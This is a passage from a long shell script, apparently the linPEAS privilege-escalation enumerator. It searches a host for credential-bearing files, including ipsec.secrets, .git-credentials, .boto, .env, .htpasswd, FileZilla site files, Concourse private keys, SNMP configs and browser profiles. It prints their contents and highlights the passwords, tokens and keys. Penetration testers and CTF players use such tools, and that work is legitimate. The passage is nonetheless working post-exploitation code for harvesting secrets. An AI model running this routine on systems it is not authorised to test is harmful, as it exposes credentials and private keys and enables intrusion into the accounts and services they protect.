  10475     if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10476 fi
  10477 
  10478 
  10479 if [ "$PSTORAGE_SIP" ] || [ "$DEBUG" ]; then
  10480   print_2title "Analyzing SIP Files (limit 70)"
  10481     if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"sip\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sip.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "sip\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sip\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|allowguest.*=.*true,${SED_RED},g"; done; echo "";
  10482     if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"amportal\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "amportal.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "amportal\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,amportal\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PASS.*=.*,${SED_RED},g"; done; echo "";
  10483     if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"FreePBX\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreePBX.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "FreePBX\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,FreePBX\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E ".*AMPDB.*=.*" | sed -${E} "s,.*AMPDB.*=.*,${SED_RED},g"; done; echo "";
  10484     if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"Elastix\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Elastix.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "Elastix\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Elastix\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*pwd.*=.*,${SED_RED},g"; done; echo "";
  10485 fi
  10486 
  10487 
  10488 if [ "$PSTORAGE_GMV_AUTH" ] || [ "$DEBUG" ]; then
  10489   print_2title "Analyzing GMV Auth Files (limit 70)"
  10490     if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo "";
  10491 fi
  10492 
  10493 
  10494 if [ "$PSTORAGE_IPSEC" ] || [ "$DEBUG" ]; then
  10495   print_2title "Analyzing IPSec Files (limit 70)"
  10496     if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo "";
  10497     if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo "";
  10498 fi
  10499 
  10500 
  10501 if [ "$PSTORAGE_IRSSI" ] || [ "$DEBUG" ]; then
  10502   print_2title "Analyzing IRSSI Files (limit 70)"
  10503     if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo "";
  10504 fi
  10505 
  10506 
  10507 if [ "$PSTORAGE_KEYRING" ] || [ "$DEBUG" ]; then
  10508   print_2title "Analyzing Keyring Files (limit 70)"
  10509     if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,keyrings$,${SED_RED},"; done; echo "";
  10510     if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo "";
  10511     if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo "";
  10512     if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.jks$,${SED_RED},"; done; echo "";
  10513 fi
  10514 
  10515 
  10516 if [ "$PSTORAGE_VIRTUAL_DISKS" ] || [ "$DEBUG" ]; then
  10517   print_2title "Analyzing Virtual Disks Files (limit 70)"
  10518     if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vhd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vhd"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vhd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vhd$,${SED_RED},"; done; echo "";
  10519     if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vhdx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vhdx"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vhdx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vhdx$,${SED_RED},"; done; echo "";
  10520     if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vmdk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vmdk"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vmdk$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vmdk$,${SED_RED},"; done; echo "";
  10521 fi
  10522 
  10523 
  10524 if [ "$PSTORAGE_FILEZILLA" ] || [ "$DEBUG" ]; then
  10525   print_2title "Analyzing Filezilla Files (limit 70)"
  10526     if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo "";
  10527     if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo "";
  10528     if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo "";
  10529 fi
  10530 
  10531 
  10532 if [ "$PSTORAGE_BACKUP_MANAGER" ] || [ "$DEBUG" ]; then
  10533   print_2title "Analyzing Backup Manager Files (limit 70)"
  10534     if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo "";
  10535     if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo "";
  10536 fi
  10537 
  10538 
  10539 if [ "$PSTORAGE_GIT" ] || [ "$DEBUG" ]; then
  10540   print_2title "Analyzing Git Files (limit 70)"
  10541     if ! [ "`echo \"$PSTORAGE_GIT\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GIT" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10542 fi
  10543 
  10544 
  10545 if [ "$PSTORAGE_ATLANTIS" ] || [ "$DEBUG" ]; then
  10546   print_2title "Analyzing Atlantis Files (limit 70)"
  10547     if ! [ "`echo \"$PSTORAGE_ATLANTIS\" | grep -E \"atlantis\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "atlantis.db"; fi; fi; printf "%s" "$PSTORAGE_ATLANTIS" | grep -E "atlantis\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,atlantis\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,CloneURL|Username,${SED_RED},g"; done; echo "";
  10548 fi
  10549 
  10550 
  10551 if [ "$PSTORAGE_CACHE_VI" ] || [ "$DEBUG" ]; then
  10552   print_2title "Analyzing Cache Vi Files (limit 70)"
  10553     if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.swp$,${SED_RED},"; done; echo "";
  10554     if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo "";
  10555 fi
  10556 
  10557 
  10558 if [ "$PSTORAGE_FIREFOX" ] || [ "$DEBUG" ]; then
  10559   print_2title "Analyzing Firefox Files (limit 70)"
  10560     if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10561     if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10562 fi
  10563 
  10564 
  10565 if [ "$PSTORAGE_CHROME" ] || [ "$DEBUG" ]; then
  10566   print_2title "Analyzing Chrome Files (limit 70)"
  10567     if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10568     if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10569 fi
  10570 
  10571 
  10572 if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then
  10573   print_2title "Analyzing Opera Files (limit 70)"
  10574     if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10575 fi
  10576 
  10577 
  10578 if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then
  10579   print_2title "Analyzing Safari Files (limit 70)"
  10580     if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10581 fi
  10582 
  10583 
  10584 if [ "$PSTORAGE_AUTOLOGIN" ] || [ "$DEBUG" ]; then
  10585   print_2title "Analyzing Autologin Files (limit 70)"
  10586     if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo "";
  10587     if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo "";
  10588 fi
  10589 
  10590 
  10591 if [ "$PSTORAGE_FASTCGI" ] || [ "$DEBUG" ]; then
  10592   print_2title "Analyzing FastCGI Files (limit 70)"
  10593     if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo "";
  10594 fi
  10595 
  10596 
  10597 if [ "$PSTORAGE_FAT_FREE" ] || [ "$DEBUG" ]; then
  10598   print_2title "Analyzing Fat-Free Files (limit 70)"
  10599     if ! [ "`echo \"$PSTORAGE_FAT_FREE\" | grep -E \"fat\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fat.config"; fi; fi; printf "%s" "$PSTORAGE_FAT_FREE" | grep -E "fat\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,fat\.config$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "password.*" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";
  10600 fi
  10601 
  10602 
  10603 if [ "$PSTORAGE_SHODAN" ] || [ "$DEBUG" ]; then
  10604   print_2title "Analyzing Shodan Files (limit 70)"
  10605     if ! [ "`echo \"$PSTORAGE_SHODAN\" | grep -E \"api_key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "api_key"; fi; fi; printf "%s" "$PSTORAGE_SHODAN" | grep -E "api_key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,api_key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10606 fi
  10607 
  10608 
  10609 if [ "$PSTORAGE_CONCOURSE" ] || [ "$DEBUG" ]; then
  10610   print_2title "Analyzing Concourse Files (limit 70)"
  10611     if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"\.flyrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".flyrc"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "\.flyrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.flyrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:*|value:.*,${SED_RED},g"; done; echo "";
  10612     if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "concourse-auth"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "concourse-auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,concourse-auth$,${SED_RED},"; find "$f" -name "host-key" | while read ff; do ls -ld "$ff" | sed -${E} "s,host-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,RSA PRIVATE KEY,${SED_RED},g"; done; echo "";find "$f" -name "local-users" | while read ff; do ls -ld "$ff" | sed -${E} "s,local-users,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "session-signing-key" | while read ff; do ls -ld "$ff" | sed -${E} "s,session-signing-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "worker-key-pub" | while read ff; do ls -ld "$ff" | sed -${E} "s,worker-key-pub,${SED_RED},"; done; echo "";done; echo "";
  10613     if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "concourse-keys"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "concourse-keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,concourse-keys$,${SED_RED},"; find "$f" -name "host_key" | while read ff; do ls -ld "$ff" | sed -${E} "s,host_key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,RSA PRIVATE KEY,${SED_RED},g"; done; echo "";find "$f" -name "session_signing_key" | while read ff; do ls -ld "$ff" | sed -${E} "s,session_signing_key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "worker_key.pub" | while read ff; do ls -ld "$ff" | sed -${E} "s,worker_key.pub,${SED_RED},"; done; echo "";done; echo "";
  10614 fi
  10615 
  10616 
  10617 if [ "$PSTORAGE_BOTO" ] || [ "$DEBUG" ]; then
  10618   print_2title "Analyzing Boto Files (limit 70)"
  10619     if ! [ "`echo \"$PSTORAGE_BOTO\" | grep -E \"\.boto$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_BOTO" | grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10620 fi
  10621 
  10622 
  10623 if [ "$PSTORAGE_SNMP" ] || [ "$DEBUG" ]; then
  10624   print_2title "Analyzing SNMP Files (limit 70)"
  10625     if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*|^createUser" | sed -${E} "s,rocommunity|rwcommunity|extend.*|^createUser,${SED_RED},g"; done; echo "";
  10626 fi
  10627 
  10628 
  10629 if [ "$PSTORAGE_PYPIRC" ] || [ "$DEBUG" ]; then
  10630   print_2title "Analyzing Pypirc Files (limit 70)"
  10631     if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo "";
  10632 fi
  10633 
  10634 
  10635 if [ "$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then
  10636   print_2title "Analyzing Postfix Files (limit 70)"
  10637     if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"aliases$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "aliases"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "aliases$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,aliases$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "\|" | sed -${E} "s,\|,${SED_RED},g"; done; echo "";
  10638     if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo "";
  10639 fi
  10640 
  10641 
  10642 if [ "$PSTORAGE_CLOUDFLARE" ] || [ "$DEBUG" ]; then
  10643   print_2title "Analyzing CloudFlare Files (limit 70)"
  10644     if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo "";
  10645 fi
  10646 
  10647 
  10648 if [ "$PSTORAGE_HTTP_CONF" ] || [ "$DEBUG" ]; then
  10649   print_2title "Analyzing Http conf Files (limit 70)"
  10650     if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo "";
  10651 fi
  10652 
  10653 
  10654 if [ "$PSTORAGE_HTPASSWD" ] || [ "$DEBUG" ]; then
  10655   print_2title "Analyzing Htpasswd Files (limit 70)"
  10656     if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10657 fi
  10658 
  10659 
  10660 if [ "$PSTORAGE_LDAPRC" ] || [ "$DEBUG" ]; then
  10661   print_2title "Analyzing Ldaprc Files (limit 70)"
  10662     if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10663 fi
  10664 
  10665 
  10666 if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then
  10667   print_2title "Analyzing Env Files (limit 70)"
  10668     if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env*"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.env.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB]|[pP][rR][iI][vV][aA][tT][eE]|[kK][eE][yY],${SED_RED},g"; done; echo "";
  10669 fi
  10670 
  10671 
  10672 if [ "$PSTORAGE_PROXY_CONFIG" ] || [ "$DEBUG" ]; then
  10673   print_2title "Analyzing Proxy Config Files (limit 70)"
  10674     if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"environment$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environment"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "environment$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,environment$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "(http|https|ftp|all)_proxy|no_proxy" | grep -Ev "^#" | sed -${E} "s,(http|https|ftp|all)_proxy|no_proxy,${SED_RED},g"; done; echo "";
